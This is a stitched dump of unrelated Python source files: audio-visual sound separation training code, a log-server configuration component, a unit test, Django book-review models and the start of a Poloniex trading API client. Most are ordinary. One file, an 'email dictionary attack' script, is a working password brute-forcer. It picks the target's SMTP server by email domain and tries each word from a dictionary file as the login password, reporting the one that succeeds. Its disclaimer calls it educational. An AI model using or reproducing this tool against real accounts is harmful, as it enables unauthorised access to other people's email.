gt_mask = (np.clip(gt_masks_[n][j, 0], 0, 1) * 255).astype(np.uint8)
pred_mask = (np.clip(pred_masks_[n][j, 0], 0, 1) * 255).astype(np.uint8)
matplotlib.image.imsave(os.path.join(args.vis, filename_gtmask), gt_mask[::-1, :])
matplotlib.image.imsave(os.path.join(args.vis, filename_predmask), pred_mask[::-1, :])
# ouput spectrogram (log of magnitude, show colormap)
filename_gtmag = os.path.join(prefix, 'gtamp{}.jpg'.format(n+1))
filename_predmag = os.path.join(prefix, 'predamp{}.jpg'.format(n+1))
gt_mag = magnitude2heatmap(gt_mag_)
pred_mag = magnitude2heatmap(pred_mag_)
matplotlib.image.imsave(os.path.join(args.vis, filename_gtmag), gt_mag[::-1, :, :])
matplotlib.image.imsave(os.path.join(args.vis, filename_predmag), pred_mag[::-1, :, :])
# output audio
filename_gtwav = os.path.join(prefix, 'gt{}.wav'.format(n+1))
filename_predwav = os.path.join(prefix, 'pred{}.wav'.format(n+1))
wavfile.write(os.path.join(args.vis, filename_gtwav), args.audRate, gt_wav)
wavfile.write(os.path.join(args.vis, filename_predwav), args.audRate, preds_wav[n])
# save frame
frames_tensor = recover_rgb(frames[idx_pos][j,:,int(args.num_frames//2)])
frames_tensor = np.asarray(frames_tensor)
filename_frame = os.path.join(prefix, 'frame{}.png'.format(idx_pos+1))
matplotlib.image.imsave(os.path.join(args.vis, filename_frame), frames_tensor)
frame = frames_tensor.copy()
# get heatmap and overlay for positive pair
height, width = masks_pos.shape[-2:]
heatmap = np.zeros((height*16, width*16))
for i in range(height):
for k in range(width):
mask_pos = masks_pos[j]
value = mask_pos[i,k]
value = 0 if value < threshold else value
ii = i * 16
jj = k * 16
heatmap[ii:ii + 16, jj:jj + 16] = value
heatmap = (heatmap * 255).astype(np.uint8)
filename_heatmap = os.path.join(prefix, 'heatmap_{}_{}.jpg'.format(idx_pos+1, idx_pos+1))
plt.imsave(os.path.join(args.vis, filename_heatmap), heatmap, cmap='hot')
heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)
fin = cv2.addWeighted(heatmap, 0.5, frame, 0.5, 0, dtype = cv2.CV_32F)
path_overlay = os.path.join(args.vis, prefix, 'overlay_{}_{}.jpg'.format(idx_pos+1, idx_pos+1))
cv2.imwrite(path_overlay, fin)
# save frame
frames_tensor = recover_rgb(frames[idx_neg][j,:,int(args.num_frames//2)])
frames_tensor = np.asarray(frames_tensor)
filename_frame = os.path.join(prefix, 'frame{}.png'.format(idx_neg+1))
matplotlib.image.imsave(os.path.join(args.vis, filename_frame), frames_tensor)
frame = frames_tensor.copy()
# get heatmap and overlay for negative pair
height, width = masks_neg.shape[-2:]
heatmap = np.zeros((height*16, width*16))
for i in range(height):
for k in range(width):
mask_neg = masks_neg[j]
value = mask_neg[i,k]
value = 0 if value < threshold else value
ii = i * 16
jj = k * 16
heatmap[ii:ii + 16, jj:jj + 16] = value
heatmap = (heatmap * 255).astype(np.uint8)
filename_heatmap = os.path.join(prefix, 'heatmap_{}_{}.jpg'.format(idx_pos+1, idx_neg+1))
plt.imsave(os.path.join(args.vis, filename_heatmap), heatmap, cmap='hot')
heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)
fin = cv2.addWeighted(heatmap, 0.5, frame, 0.5, 0, dtype = cv2.CV_32F)
path_overlay = os.path.join(args.vis, prefix, 'overlay_{}_{}.jpg'.format(idx_pos+1, idx_neg+1))
cv2.imwrite(path_overlay, fin)
vis_rows.append(row_elements)
def evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader, history, epoch, args):
print('Evaluating at {} epochs...'.format(epoch))
torch.set_grad_enabled(False)
# remove previous viz results
makedirs(args.vis, remove=False)
# switch to eval mode
netWrapper1.eval()
netWrapper2.eval()
netWrapper3.eval()
# initialize meters
loss_meter = AverageMeter()
loss_acc_meter = AverageMeter()
loss_sep_meter = AverageMeter()
loss_loc_meter = AverageMeter()
sdr_mix_meter = AverageMeter()
sdr_meter = AverageMeter()
sir_meter = AverageMeter()
sar_meter = AverageMeter()
vis_rows = []
for i, batch_data in enumerate(loader):
mag_mix = batch_data['mag_mix']
mags = batch_data['mags']
frames = batch_data['frames']
N = args.num_mix
B = mag_mix.shape[0]
for n in range(N):
frames[n] = torch.autograd.Variable(frames[n]).to(args.device)
mags[n] = torch.autograd.Variable(mags[n]).to(args.device)
mag_mix = torch.autograd.Variable(mag_mix).to(args.device)
# forward pass
# return feat_sound
feat_sound, outputs = netWrapper1.forward(mags, mag_mix, args)
gt_masks = outputs['gt_masks']
mag_mix_ = outputs['mag_mix']
weight_ = outputs['weight']
# return feat_frame, and emb_frame
feat_frame, emb_frame = netWrapper2.forward(frames, args)
# randomly select positive/negative pairs
idx_pos = torch.randint(0, N, (1,))
idx_neg = N - 1 - idx_pos
# appearance attention
masks = netWrapper3.forward(feat_frame, emb_frame[idx_pos], args)
mask_pos = masks[idx_pos]
mask_neg = masks[idx_neg]
# max pooling
pred_pos = F.adaptive_max_pool2d(mask_pos, 1)
pred_pos = pred_pos.view(mask_pos.shape[0])
pred_neg = F.adaptive_max_pool2d(mask_neg, 1)
pred_neg = pred_neg.view(mask_neg.shape[0])
# ground truth for the positive/negative pairs
y1 = torch.ones(B,device=args.device).detach()
y0 = torch.zeros(B, device=args.device).detach()
# localization loss
loss_loc_pos = crit_loc(pred_pos, y1).reshape(1)
loss_loc_neg = crit_loc(pred_neg, y0).reshape(1)
loss_loc = args.lamda * (loss_loc_pos + loss_loc_neg)/N
# Calculate val accuracy
pred_pos = (pred_pos > args.mask_thres)
pred_neg = (pred_neg > args.mask_thres)
valacc = 0
for j in range(B):
if pred_pos[j].item() == y1[j].item():
valacc += 1.0
if pred_neg[j].item() == y0[j].item():
valacc += 1.0
valacc = valacc/N/B
# separate sounds
sound_size = feat_sound.size()
B, C = sound_size[0], sound_size[1]
pred_masks = [None for n in range(N)]
for n in range(N):
feat_img = emb_frame[n]
feat_img = feat_img.view(B, 1, C)
pred_masks[n] = torch.bmm(feat_img, feat_sound.view(B, C, -1)) \
.view(B, 1, *sound_size[2:])
pred_masks[n] = activate(pred_masks[n], args.output_activation)
# separation loss
loss_sep = crit_sep(pred_masks, gt_masks, weight_).reshape(1)
# total loss
loss = loss_loc + loss_sep
loss_meter.update(loss.item())
loss_acc_meter.update(valacc)
loss_sep_meter.update(loss_sep.item())
loss_loc_meter.update(loss_loc.item())
print('[Eval] iter {}, loss: {:.4f}, loss_loc: {:.4f}, loss_sep: {:.4f}, acc: {:.4f} '.format(i, loss.item(), loss_loc.item(), loss_sep.item(), valacc))
# calculate metrics
sdr_mix, sdr, sir, sar = calc_metrics(batch_data, pred_masks, args)
sdr_mix_meter.update(sdr_mix)
sdr_meter.update(sdr)
sir_meter.update(sir)
sar_meter.update(sar)
# output visualization
if len(vis_rows) < args.num_vis:
output_visuals_PosNeg(vis_rows, batch_data, mask_pos, mask_neg, idx_pos, idx_neg, pred_masks, gt_masks, mag_mix_, weight_, args)
print('[Eval Summary] Epoch: {}, Loss: {:.4f}, Loss_loc: {:.4f}, Loss_sep: {:.4f}, acc: {:.4f}, sdr_mix: {:.4f}, sdr: {:.4f}, sir: {:.4f}, sar: {:.4f}, '
.format(epoch, loss_meter.average(), loss_loc_meter.average(), loss_sep_meter.average(), loss_acc_meter.average(), sdr_mix_meter.average(), sdr_meter.average(), sir_meter.average(), sar_meter.average()))
history['val']['epoch'].append(epoch)
history['val']['err'].append(loss_meter.average())
history['val']['err_loc'].append(loss_loc_meter.average())
history['val']['err_sep'].append(loss_sep_meter.average())
history['val']['acc'].append(loss_acc_meter.average())
history['val']['sdr'].append(sdr_meter.average())
history['val']['sir'].append(sir_meter.average())
history['val']['sar'].append(sar_meter.average())
# Plot figure
if epoch > 0:
print('Plotting figures...')
plot_loss_loc_sep_acc_metrics(args.ckpt, history)
print('this evaluation round is done!')
# train one epoch
def train(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader, optimizer, history, epoch, args):
print('Training at {} epochs...'.format(epoch))
torch.set_grad_enabled(True)
batch_time = AverageMeter()
data_time = AverageMeter()
# switch to train mode
netWrapper1.train()
netWrapper2.train()
netWrapper3.train()
# main loop
torch.cuda.synchronize()
tic = time.perf_counter()
for i, batch_data in enumerate(loader):
mag_mix = batch_data['mag_mix']
mags = batch_data['mags']
frames = batch_data['frames']
N = args.num_mix
B = mag_mix.shape[0]
for n in range(N):
frames[n] = torch.autograd.Variable(frames[n]).to(args.device)
mags[n] = torch.autograd.Variable(mags[n]).to(args.device)
mag_mix = torch.autograd.Variable(mag_mix).to(args.device)
# forward pass
optimizer.zero_grad()
# return feat_sound
feat_sound, outputs = netWrapper1.forward(mags, mag_mix, args)
gt_masks = outputs['gt_masks']
mag_mix_ = outputs['mag_mix']
weight_ = outputs['weight']
# return feat_frame, and emb_frame
feat_frame, emb_frame = netWrapper2.forward(frames, args)
        # randomly select positive/negative pairs
idx_pos = torch.randint(0,N, (1,))
idx_neg = N -1 -idx_pos
# appearance attention
masks = netWrapper3.forward(feat_frame, emb_frame[idx_pos], args)
mask_pos = masks[idx_pos]
mask_neg = masks[idx_neg]
# max pooling
pred_pos = F.adaptive_max_pool2d(mask_pos, 1)
pred_pos = pred_pos.view(mask_pos.shape[0])
pred_neg = F.adaptive_max_pool2d(mask_neg, 1)
pred_neg = pred_neg.view(mask_neg.shape[0])
# ground truth for the positive/negative pairs
y1 = torch.ones(B,device=args.device).detach()
y0 = torch.zeros(B, device=args.device).detach()
# localization loss and acc
loss_loc_pos = crit_loc(pred_pos, y1).reshape(1)
loss_loc_neg = crit_loc(pred_neg, y0).reshape(1)
loss_loc = args.lamda * (loss_loc_pos + loss_loc_neg)/N
pred_pos = (pred_pos > args.mask_thres)
pred_neg = (pred_neg > args.mask_thres)
valacc = 0
for j in range(B):
if pred_pos[j].item() == y1[j].item():
valacc += 1.0
if pred_neg[j].item() == y0[j].item():
valacc += 1.0
valacc = valacc/N/B
        # separate sounds (for simplicity, we don't use the alpha and beta)
sound_size = feat_sound.size()
B, C = sound_size[0], sound_size[1]
pred_masks = [None for n in range(N)]
for n in range(N):
feat_img = emb_frame[n]
feat_img = feat_img.view(B, 1, C)
pred_masks[n] = torch.bmm(feat_img, feat_sound.view(B, C, -1)) \
.view(B, 1, *sound_size[2:])
pred_masks[n] = activate(pred_masks[n], args.output_activation)
# separation loss
loss_sep = crit_sep(pred_masks, gt_masks, weight_).reshape(1)
# total loss
loss = loss_loc + loss_sep
loss.backward()
optimizer.step()
# measure total time
torch.cuda.synchronize()
batch_time.update(time.perf_counter() - tic)
tic = time.perf_counter()
# display
if i % args.disp_iter == 0:
print('Epoch: [{}][{}/{}], Time: {:.2f}, Data: {:.2f}, '
'lr_sound: {}, lr_frame: {}, lr_avol: {}, '
'loss: {:.5f}, loss_loc: {:.5f}, loss_sep: {:.5f}, acc: {:.5f} '
.format(epoch, i, args.epoch_iters,
batch_time.average(), data_time.average(),
args.lr_sound, args.lr_frame, args.lr_avol,
loss.item(), loss_loc.item(), loss_sep.item(),
valacc))
fractional_epoch = epoch - 1 + 1. * i / args.epoch_iters
history['train']['epoch'].append(fractional_epoch)
history['train']['err'].append(loss.item())
history['train']['err_loc'].append(loss_loc.item())
history['train']['err_sep'].append(loss_sep.item())
history['train']['acc'].append(valacc)
def checkpoint(net_sound, net_frame, net_avol, optimizer, history, epoch, args):
print('Saving checkpoints at {} epochs.'.format(epoch))
suffix_latest = 'latest.pth'
suffix_best = 'best.pth'
state = {'epoch': epoch, \
'state_dict_net_sound': net_sound.state_dict(), \
'state_dict_net_frame': net_frame.state_dict(),\
'state_dict_net_avol': net_avol.state_dict(),\
'optimizer': optimizer.state_dict(), \
'history': history, }
torch.save(state, '{}/checkpoint_{}'.format(args.ckpt, suffix_latest))
cur_err = history['val']['err'][-1]
if cur_err <= args.best_err:
args.best_err = cur_err
torch.save(state, '{}/checkpoint_{}'.format(args.ckpt, suffix_best))
def load_checkpoint(net_sound, net_frame, net_avol, optimizer, history, filename):
start_epoch = 0
if os.path.isfile(filename):
print("=> loading checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
start_epoch = checkpoint['epoch'] + 1
net_sound.load_state_dict(checkpoint['state_dict_net_sound'])
net_frame.load_state_dict(checkpoint['state_dict_net_frame'])
net_avol.load_state_dict(checkpoint['state_dict_net_avol'])
optimizer.load_state_dict(checkpoint['optimizer'])
for state in optimizer.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.cuda()
history = checkpoint['history']
print("=> loaded checkpoint '{}' (epoch {})"
.format(filename, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(filename))
return net_sound, net_frame, net_avol, optimizer, start_epoch, history
def load_checkpoint_from_train(net_sound, net_frame, net_avol, filename):
if os.path.isfile(filename):
print("=> loading checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
print('epoch: ', checkpoint['epoch'])
net_sound.load_state_dict(checkpoint['state_dict_net_sound'])
net_frame.load_state_dict(checkpoint['state_dict_net_frame'])
net_avol.load_state_dict(checkpoint['state_dict_net_avol'])
else:
print("=> no checkpoint found at '{}'".format(filename))
return net_sound, net_frame, net_avol
def load_sep(net_sound, net_frame, filename):
if os.path.isfile(filename):
print("=> loading checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
print('epoch: ', checkpoint['epoch'])
net_sound.load_state_dict(checkpoint['state_dict_net_sound'])
net_frame.load_state_dict(checkpoint['state_dict_net_frame'])
else:
print("=> no checkpoint found at '{}'".format(filename))
return net_sound, net_frame
def create_optimizer(net_sound, net_frame, net_avol, args):
param_groups = [{'params': net_sound.parameters(), 'lr': args.lr_frame},
{'params': net_frame.parameters(), 'lr': args.lr_sound},
{'params': net_avol.parameters(), 'lr': args.lr_avol}]
return torch.optim.SGD(param_groups, momentum=args.beta1, weight_decay=args.weight_decay)
def adjust_learning_rate(optimizer, args):
args.lr_sound *= 0.1
args.lr_frame *= 0.1
args.lr_avol *= 0.1
for param_group in optimizer.param_groups:
param_group['lr'] *= 0.1
def main(args):
# Network Builders
torch.manual_seed(0)
torch.cuda.manual_seed(0)
np.random.seed(0)
random.seed(0)
builder = ModelBuilder()
net_sound = builder.build_sound(
arch=args.arch_sound,
input_channel=1,
output_channel=args.num_channels,
fc_dim=args.num_channels,
weights=args.weights_sound)
net_frame = builder.build_frame(
arch=args.arch_frame,
fc_dim=args.num_channels,
pool_type=args.img_pool,
weights=args.weights_frame)
net_avol = builder.build_avol(
arch=args.arch_avol,
fc_dim=args.num_channels,
weights=args.weights_frame)
crit_loc = nn.BCELoss()
crit_sep = builder.build_criterion(arch=args.loss)
# Dataset and Loader
dataset_train = MUSICMixDataset(
args.list_train, args, split='train')
dataset_val = MUSICMixDataset(
args.list_val, args, max_sample=args.num_val, split='val')
loader_train = torch.utils.data.DataLoader(
dataset_train,
batch_size=args.batch_size,
shuffle=True,
num_workers=int(args.workers),
drop_last=True)
loader_val = torch.utils.data.DataLoader(
dataset_val,
batch_size=args.batch_size,
shuffle=False,
num_workers=int(args.workers),
drop_last=False)
args.epoch_iters = len(dataset_train) // args.batch_size
print('1 Epoch = {} iters'.format(args.epoch_iters))
# Set up optimizer
optimizer = create_optimizer(net_sound, net_frame, net_avol, args)
    # History of performance
history = {
'train': {'epoch': [], 'err': [], 'err_loc': [], 'err_sep': [], 'acc': []},
'val': {'epoch': [], 'err': [], 'err_loc': [], 'err_sep': [], 'acc': [], 'sdr': [], 'sir': [], 'sar': []}}
# Training loop
# Load from pretrained models
start_epoch = 1
model_name = args.ckpt + '/checkpoint.pth'
if os.path.exists(model_name):
if args.mode == 'eval':
net_sound, net_frame, net_avol = load_checkpoint_from_train(net_sound, net_frame, net_avol, model_name)
elif args.mode == 'train':
model_name = args.ckpt + '/checkpoint_latest.pth'
net_sound, net_frame, net_avol, optimizer, start_epoch, history = load_checkpoint(net_sound, net_frame, net_avol, optimizer, history, model_name)
print("Loading from previous checkpoint.")
else:
if args.mode == 'train' and start_epoch==1 and os.path.exists(args.weights_model):
net_sound, net_frame = load_sep(net_sound, net_frame, args.weights_model)
print("Loading from appearance + sound checkpoint.")
# Wrap networks
netWrapper1 = NetWrapper1(net_sound)
netWrapper1 = torch.nn.DataParallel(netWrapper1, device_ids=range(args.num_gpus)).cuda()
netWrapper1.to(args.device)
netWrapper2 = NetWrapper2(net_frame)
netWrapper2 = torch.nn.DataParallel(netWrapper2, device_ids=range(args.num_gpus)).cuda()
netWrapper2.to(args.device)
netWrapper3 = NetWrapper3(net_avol)
netWrapper3 = torch.nn.DataParallel(netWrapper3, device_ids=range(args.num_gpus)).cuda()
netWrapper3.to(args.device)
# Eval mode
#evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_val, history, 0, args)
if args.mode == 'eval':
evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_val, history, 0, args)
print('Evaluation Done!')
return
for epoch in range(start_epoch, args.num_epoch + 1):
train(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_train, optimizer, history, epoch, args)
# drop learning rate
if epoch in args.lr_steps:
adjust_learning_rate(optimizer, args)
## Evaluation and visualization
if epoch % args.eval_epoch == 0:
evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_val, history, epoch, args)
# checkpointing
checkpoint(net_sound, net_frame, net_avol, optimizer, history, epoch, args)
print('Training Done!')
if __name__ == '__main__':
# arguments
parser = ArgParser()
args = parser.parse_train_arguments()
args.batch_size = args.num_gpus * args.batch_size_per_gpu
args.device = torch.device("cuda")
# experiment name
if args.mode == 'train':
args.id += '-{}mix'.format(args.num_mix)
if args.log_freq:
args.id += '-LogFreq'
args.id += '-{}-{}-{}'.format(
args.arch_frame, args.arch_sound, args.arch_avol)
args.id += '-frames{}stride{}'.format(args.num_frames, args.stride_frames)
args.id += '-{}'.format(args.img_pool)
if args.binary_mask:
assert args.loss == 'bce', 'Binary Mask should go with BCE loss'
args.id += '-binary'
else:
args.id += '-ratio'
if args.weighted_loss:
args.id += '-weightedLoss'
args.id += '-channels{}'.format(args.num_channels)
args.id += '-epoch{}'.format(args.num_epoch)
args.id += '-step' + '_'.join([str(x) for x in args.lr_steps])
print('Model ID: {}'.format(args.id))
# paths to save/load output
args.ckpt = os.path.join(args.ckpt, args.id)
if args.mode == 'train':
args.weights_model = 'ckpt_res50_DV3P_MUSIC_N2_f1_binary_bs10_TrainS335_D65_ValValS100_ValTestS130_dup100_f8fps_11k/MUSIC-2mix-LogFreq-resnet18dilated_50-deeplabV3Plus_mobilenetv2-frames1stride24-maxpool-binary-weightedLoss-channels11-epoch100-step40_80/checkpoint.pth'
args.vis = os.path.join(args.ckpt, 'visualization_train/')
makedirs(args.ckpt, remove=False)
elif args.mode == 'eval':
args.vis = os.path.join(args.ckpt, 'visualization_val/')
elif args.mode == 'test':
args.vis = os.path.join(args.ckpt, 'visualization_test/')
# initialize best error with a big number
args.best_err = float("inf")
random.seed(args.seed)
torch.manual_seed(args.seed)
main(args)
|
StarcoderdataPython
|
166596
|
<reponame>softwarefactory-project/sf-conf
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sfconfig.components import Component
class LogServer(Component):
def prepare(self, args):
super(LogServer, self).prepare(args)
args.glue["loguser_authorized_keys"] = []
def configure(self, args, host):
self.get_or_generate_ssh_key(args, "zuul_logserver_rsa")
args.glue["logservers"].append({
"name": "sflogs",
"host": args.glue["logserver_host"],
"user": "loguser",
"path": "/var/www/logs",
})
if args.glue["logserver_host"] != args.glue["install_server_host"]:
args.glue.setdefault("zuul_ssh_known_hosts", []).append({
"host_packed": args.glue["logserver_host"],
"host": args.glue["logserver_host"],
"port": 22
})
args.glue["logs_expiry"] = args.sfconfig["logs"]["expiry"]
args.glue["loguser_authorized_keys"].append(
args.glue["zuul_logserver_rsa_pub"])
# When logserver is hosted on the gateway, we can use fqdn instead
args.glue["logserver_hostname"] = args.glue["logserver_host"]
if args.glue["logserver_host"] == args.glue["gateway_host"]:
args.glue["logserver_hostname"] = args.sfconfig["fqdn"]
|
StarcoderdataPython
|
120751
|
<reponame>continual-ml/forgetful-networks<filename>model.py<gh_stars>0
import torch
import torch.nn as nn
def make_processor(in_dim: int, out_dim: int) -> nn.Module:
return nn.Sequential(
nn.Linear(in_dim, 128),
nn.LeakyReLU(0.2),
nn.Linear(128, 32),
nn.LeakyReLU(0.2),
nn.Linear(32, out_dim)
)
def freeze(module: nn.Module, state: bool=True) -> None:
for param in module.parameters():
param.requires_grad_(not state)
class Frozen(nn.Module):
def __init__(self, module: nn.Module) -> None:
super(Frozen, self).__init__()
self._module = module
def forward(self, x):
freeze(self._module, True)
result = self._module(x)
freeze(self._module, False)
return result
class Classifier(nn.Module):
def __init__(self, processor: nn.Module, head: nn.Module) -> None:
super(Classifier, self).__init__()
self._processor = processor
self._decision = head
def forward(self, img: torch.Tensor) -> torch.Tensor:
return self._decision(self._processor(img))
class Ensemble(nn.Module):
def __init__(self, processors: list, classifier) -> None:
super(Ensemble, self).__init__()
self._processors = processors # unregistered parameters
self._classifier = classifier
def forward(self, img: torch.Tensor) -> tuple:
processed = torch.cat([
p(img).unsqueeze(0) for p in self._processors
], dim=0)
avg = processed.mean(dim=0)
std = processed.std(dim=0).sum(dim=1)
y_pred = torch.sigmoid(self._classifier(avg))
return y_pred, std
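# Editor-added usage sketch (not part of the original repository): shows how the pieces
# above are assumed to fit together, with a head mapping the processor output to a single
# logit. The dimensions (784-dim inputs, 3 processors, batch of 4) are illustrative only.
if __name__ == '__main__':
    processors = [make_processor(in_dim=784, out_dim=16) for _ in range(3)]
    head = nn.Linear(16, 1)
    ensemble = Ensemble(processors, head)
    dummy = torch.randn(4, 784)      # batch of 4 flattened inputs
    y_pred, std = ensemble(dummy)    # sigmoid prediction and per-sample ensemble spread
    print(y_pred.shape, std.shape)   # expected: torch.Size([4, 1]) torch.Size([4])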
|
StarcoderdataPython
|
3250386
|
""" Gestion de fichiers """
from log_generator.exit_program import exitProgram
from zipfile import ZipFile
import os.path
import shutil
# Check whether the file exists
def file_exist_check(file_with_path:str):
status:bool = False
try:
status = os.path.exists(file_with_path)
except OSError:
print("File handler: Check file exist: " + file_with_path + " fichier non trouve")
return status
# Check whether the file exists; exit the program if it does not
def file_exist_check_ifNot_exit(file_with_path:str):
try:
status = os.path.exists(file_with_path)
if not status:
print("File handler: Check file exist: " + file_with_path + " fichier non trouve")
exitProgram()
except OSError:
print("File handler: Check file exist: " + file_with_path + " fichier non trouve")
exitProgram()
def remove_directory(folder:str):
try:
os.path.isdir(folder)
shutil.rmtree(folder)
except OSError:
print("File handler: problème avec la suppression du repertoire")
exitProgram()
def remove_file(file:str):
try:
os.path.isfile(file)
os.remove(file)
except OSError:
print("File handler: problème avec la suppression du fichier")
exitProgram()
# Move a directory
def move_directory(src_path:str, dest_path:str):
try:
#shutil.move(pathFile + myNewFolderName + '/' + 'IP2LOCATION-LITE-DB11.CSV', myPath + 'IP2LOCATION-LITE-DB11.CSV' )
shutil.move(src_path, dest_path)
except:
print("File handler: probleme de deplacement de : " + src_path + " vers " + dest_path)
exitProgram()
# Rename a directory
def rename_directory(current_folder_name:str, new_folder_name:str):
try:
os.path.isdir(current_folder_name)
os.rename(current_folder_name, new_folder_name)
except:
print("File handler: probleme de renomage de : " + current_folder_name + " en " + new_folder_name)
exitProgram()
# Extract a specific file from a Zip archive
def extract_a_specified_file_from_zip_archive(archive_path_file_name:str, fileName_to_extract:str, dest_extraction_path:str):
with ZipFile(archive_path_file_name, mode="r") as zip_ref:
try:
zip_ref.extract(fileName_to_extract, dest_extraction_path)
zip_ref.close()
except:
print("File handler: probleme d'extraction de l'archive: " + archive_path_file_name)
exitProgram()
# Check that the file size is not zero
def check_sizeFileNotNull(path_and_file_name:str):
    if not os.path.isfile(path_and_file_name) or os.path.getsize(path_and_file_name) == 0:
        print("File handler: le fichier : " + path_and_file_name + " est introuvable ou presente une taille nulle")
exitProgram()
def move_file(src_path_file:str, dest_path_file:str):
try:
shutil.move(src_path_file, dest_path_file)
except:
print("File handler: le fichier " + src_path_file + " deplace vers : " + dest_path_file)
# Write to the log persistence file specified by the command-line argument
def write_file(fileNamePath: str, content: str):
try:
file = open(fileNamePath, "a")
file.write(content + "\n")
except OSError:
print("File handler: Impossible decrire dans le fichier " + fileNamePath)
exitProgram()
# Read a text file
def read_file(filename:str):
try:
with open(filename, "r") as fileToRead:
line = fileToRead.readline()
except IOError:
print("file_handler: impossible d'ouvrir le fichier pour la lecture: " + filename)
exitProgram()
return line
|
StarcoderdataPython
|
29255
|
<filename>test/test_document.py
# test utilities
import unittest
from decimal import Decimal
# tested module
import madseq
class Test_Document(unittest.TestCase):
def test_parse_line(self):
parse = madseq.Document.parse_line
Element = madseq.Element
self.assertEqual(list(parse(' \t ')),
[''])
self.assertEqual(list(parse(' \t ! a comment; ! ')),
['! a comment; ! '])
self.assertEqual(list(parse(' use, z=23.23e2; k: z; !')),
['!',
Element(None, 'use', {'z': Decimal('23.23e2')}),
Element('k', 'z', {})])
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1777390
|
# <NAME>
# 10/15/2017
# Tested and Developed on Python 2.7 and 3.5 / Configured for Windows, Linux, and Mac
# Strictly For Educational/Ethical Pen Testing Purposes ONLY. I condone no illegal activities with this script
# Use of this code for unlawful purposes is wrong in every sense of the word, a crime, and strictly discouraged
# To help discourage/limit illegal use of this code, advanced functionality of the script has been removed/limited
# All sample dictionary files provided in this repo were 100% legally created and include their own license/disclaimer
# How to use the code:
# python email_dictionary_attack.py
# "target_email" - Email you wish to 'hack'
# "selected_dictionary" - Dictionary located in the dictionaries directory folder you want to use
# "email_service" *Optional - enter only if you have an email we support with a different domain
# (i.e. business email running on gmail, parameter default value is 'gmail.com')
# "port" *Optional - default is 587*
# Usage examples:
# python email_dictionary_attack.py "<EMAIL>" "Top196-probable.txt" "gmail.com" "587"
# or
# python email_dictionary_attack.py "<EMAIL>" "Top196-probable.txt"
import smtplib
import os
import sys
# Email Server Dictionary
available_server_dict ={'gmail.com': 'smtp.gmail.com', 'hotmail.com': 'smtp.live.com',
'live.com': 'smtp.live.com', 'yahoo.com': 'smtp.mail.yahoo.com',
'ymail.com': 'smtp.mail.yahoo.com', 'yahoo.co.uk': 'smtp.mail.yahoo.com',
'sbcglobal.net': 'smtp.mail.att.net', 'prodigy.net': 'smtp.mail.att.net',
'windstream.net': 'smtp.windstream.net', 'comcast.net': 'smtp.comcast.net'}
# OS Specific Parameters
os_system = os.name
if os_system == 'nt':
dict_dir = '\\dictionaries\\'
else:
dict_dir = '/dictionaries/'
# Function to get user name based on inputted email string
def get_server_conn_string(email_string, email_service):
parsed_email_domain = str(email_string.split('@')[1])
if parsed_email_domain in available_server_dict.keys():
smtp_string = available_server_dict[parsed_email_domain]
else:
smtp_string = available_server_dict[email_service]
return smtp_string
# Function to run dictionary attack
def run_dict_attack(target_email, selected_dictionary, email_service='gmail.com', port=587):
server_conn_string = get_server_conn_string(target_email, email_service)
smtpserver = smtplib.SMTP(server_conn_string, port)
smtpserver.ehlo()
smtpserver.starttls()
cwd = os.getcwd()
sel_dict = open(cwd + dict_dir + selected_dictionary, "r")
for word in sel_dict:
try:
smtpserver.login(target_email, word)
print("[*]--------> Success!\n [*]----------> User's Password Determined: " + word)
break
except smtplib.SMTPAuthenticationError:
print("[!]--------> Incorrect Password: " + word)
if __name__ == "__main__":
sys_arg_list = sys.argv
len_sys_arg = len(sys.argv)
print(len_sys_arg)
if len_sys_arg == 3:
run_dict_attack(sys.argv[1], sys.argv[2])
elif len_sys_arg == 4:
run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3])
elif len_sys_arg == 5:
run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]))
else:
print("[!]--------> Incorrect number of script parameters entered!")
sys.exit(1)
|
StarcoderdataPython
|
93440
|
# coding:utf-8
from django.db import models
# isbn13:9787111013853
class Comment(models.Model):
"""
评论模型
"""
isbn13 = models.CharField(max_length=200,default=None)
author = models.CharField(max_length=200,null=True,blank=True,default=None)
time = models.CharField(max_length=200,null=True,blank=True,default=None)
star = models.IntegerField(default=None)
vote = models.CharField(max_length=200,null=True,blank=True,default=None)
content = models.TextField(default=None)
def __unicode__(self):
return self.isbn13
class Reading(models.Model):
"""
    Reading guide model
"""
isbn13 = models.CharField(max_length=200,default=None)
title = models.TextField(default=None)
note = models.TextField(default=None)
def __unicode__(self):
return self.title
class Review(models.Model):
"""
    Book review model
"""
isbn13 = models.CharField(max_length=200, default=None)
title = models.TextField(default=None)
author = models.TextField(default=None)
content = models.TextField(default=None)
def __unicode__(self):
return self.title
|
StarcoderdataPython
|
3274905
|
#!/usr/bin/env python
import urllib
import urllib2
import hashlib
import hmac
import time
import json
import sys
import os.path
class poloniex(object):
_trade_api_url = 'https://poloniex.com/tradingApi'
_public_api_url = 'https://poloniex.com/public'
_dump_file_prefix = 'dump_polo_'
def __init__(self, api_key, api_secret, debug=False):
self.debug = debug
self.api_key = api_key
self.api_secret = api_secret
def _trade_api_query(self, command, params={}):
result = None
try:
dump_filename = poloniex._dump_file_prefix + command + '.json'
if not self.debug or not os.path.exists(dump_filename):
params['command'] = command
params['nonce'] = int(time.time() * 1000.0)
post_data = urllib.urlencode(params)
